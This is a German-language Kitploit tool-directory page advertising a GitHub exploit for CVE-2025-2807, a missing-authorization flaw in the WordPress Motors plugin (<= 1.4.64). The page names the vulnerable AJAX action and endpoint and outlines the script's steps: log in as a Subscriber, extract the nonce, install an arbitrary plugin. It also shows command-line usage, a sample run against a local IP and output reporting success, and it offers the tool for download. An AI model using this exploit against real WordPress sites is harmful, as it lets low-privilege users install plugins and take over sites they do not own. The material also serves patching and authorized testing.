Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2807 — Wordpress - Motors Plugin <= 1.4.64 - Schwachstelle bei der Installation beliebiger Plugins | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-2807
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubnxploited/cve-2025-2807

CVE-2025-2807

Wordpress - Motors Plugin <= 1.4.64 - Schwachstelle bei der Installation beliebiger Plugins

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-2807: Motors Plugin <= 1.4.64 - Schwachstelle bei der Installation beliebiger Plugins

Exploit von: Nxploited | Khaled Alenazi


⚠️ Zusammenfassung der Schwachstelle

Plugin: Motors (<= 1.4.64)
Typ: Fehlende Autorisierung für authentifizierte (Subscriber+) beliebige Plugin-Installation
Schweregrad: 8.8 (CVSS v3)
Entdeckt am: 07. April 2025
VDP: Nein


🔥 Auswirkungen des Exploits

Diese Schwachstelle ermöglicht es jedem authentifizierten WordPress-Benutzer (Subscriber+), beliebige Plugins ohne ordnungsgemäße Autorisierungsprüfung zu installieren.

Aufgrund der fehlenden Berechtigungsprüfung in der Funktion mvl_setup_wizard_install_plugin kann ein Benutzer mit niedrigen Berechtigungen Aktionen ausführen, die Administratoren vorbehalten sind.

📅 Es ist zu erwarten, dass diese Schwachstelle aufgrund ihrer Einfachheit und kritischen Auswirkungen massenhaft ausgenutzt wird.


🚫 Technische Details

  • Verwundbarer Endpunkt: /wp-admin/admin-ajax.php
  • Verwundbare Aktion: mvl_setup_wizard_install_plugin
  • Erforderliche Zugriffsstufe: Subscriber+ (angemeldeter Benutzer)
  • Kernproblem: Fehlende current_user_can('install_plugins')- oder ähnliche Berechtigungsprüfung

🚀 Exploit-Skript (Python)

Dieses Skript:

  1. Meldet sich als Subscriber an
  2. Extrahiert das erforderliche Nonce (aus HTML oder JS)
  3. Löst den verwundbaren AJAX-Aufruf aus, um ein Plugin Ihrer Wahl zu installieren

📃 Verwendung

root@kitploit:~
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)

🐞 Beispielausführung

root@kitploit:~
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

Ausgabe:

root@kitploit:~
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}


✨ Exploit von Nxploited (Khaled Alenazi)

Tool herunterladen